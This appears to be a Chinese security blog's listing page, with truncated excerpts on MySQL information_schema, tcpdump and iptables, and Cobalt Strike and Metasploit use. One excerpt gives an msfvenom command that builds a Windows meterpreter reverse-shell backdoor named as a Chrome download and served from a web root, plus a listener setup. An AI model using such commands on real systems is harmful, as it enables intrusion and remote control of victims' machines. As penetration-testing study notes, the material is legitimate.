上一页 1 ··· 3 4 5 6 7 8 下一页
摘要: MySQL数据库自带的数据库information_schema 里面有三个比较重要的表 SCHEMATA 、TABLES 、 COLUMNS 保存数据库所有的数据库名 表名 字段名 SCHEMATA->保存着数据库里所有的数据库的名字(包括自身),通过这个表能查出所有数据库的名字! TABLES- 阅读全文
posted @ 2021-05-14 00:09 流亡青年 阅读(43) 评论(0) 推荐(0) 编辑
摘要: https://blog.csdn.net/cuckoo1/article/details/52165449 阅读全文
posted @ 2021-05-08 14:51 流亡青年 阅读(33) 评论(0) 推荐(0) 编辑
摘要: https://smalin.cn/categories/Linux/ 阅读全文
posted @ 2021-05-05 19:46 流亡青年 阅读(6) 评论(0) 推荐(0) 编辑
摘要: 抓指定端口,这里以7070端口为例 tcpdump -i ens192 port 7070 -s 0 -l -A -w /chris/70.pcap ens192是网卡 抓完ctrl c停止 抓指定IP,这里eth0是网卡 tcpdump -i eth0 host 192.168.5.12 -w / 阅读全文
posted @ 2021-04-21 15:54 流亡青年 阅读(16459) 评论(0) 推荐(0) 编辑
摘要: 用管理员权限运行iptables -I INPUT -p tcp --dport 80 -j ACCEPT 阅读全文
posted @ 2021-04-21 15:25 流亡青年 阅读(132) 评论(0) 推荐(0) 编辑
摘要: 0x00 前言 继前一章介绍了Cobalt Strike的基本用法,本章接着介绍如何攻击、提权、维权等。 0x01 与Metasploit联动 Cobalt Strike → Metasploit msf开启监听模式 use exploit/multi/handler set payload win 阅读全文
posted @ 2021-04-19 17:25 流亡青年 阅读(436) 评论(0) 推荐(1) 编辑
摘要: 0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资 阅读全文
posted @ 2021-04-19 17:22 流亡青年 阅读(4979) 评论(0) 推荐(0) 编辑
摘要: 生成backdoor msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.187.133 LPORT=6666 -f exe >/var/www/html/chrome/1.exe 设置监听参数 use exploit/mult 阅读全文
posted @ 2021-04-15 16:34 流亡青年 阅读(65) 评论(0) 推荐(0) 编辑
摘要: php python java Go C语言 C# 易语言 TRANSLATE with x English Arabic Hebrew Polish Bulgarian Hindi Portuguese Catalan Hmong Daw Romanian Chinese Simplified H 阅读全文
posted @ 2021-04-14 15:27 流亡青年 阅读(118) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2021-04-11 17:40 流亡青年 阅读(6) 评论(0) 推荐(0) 编辑
上一页 1 ··· 3 4 5 6 7 8 下一页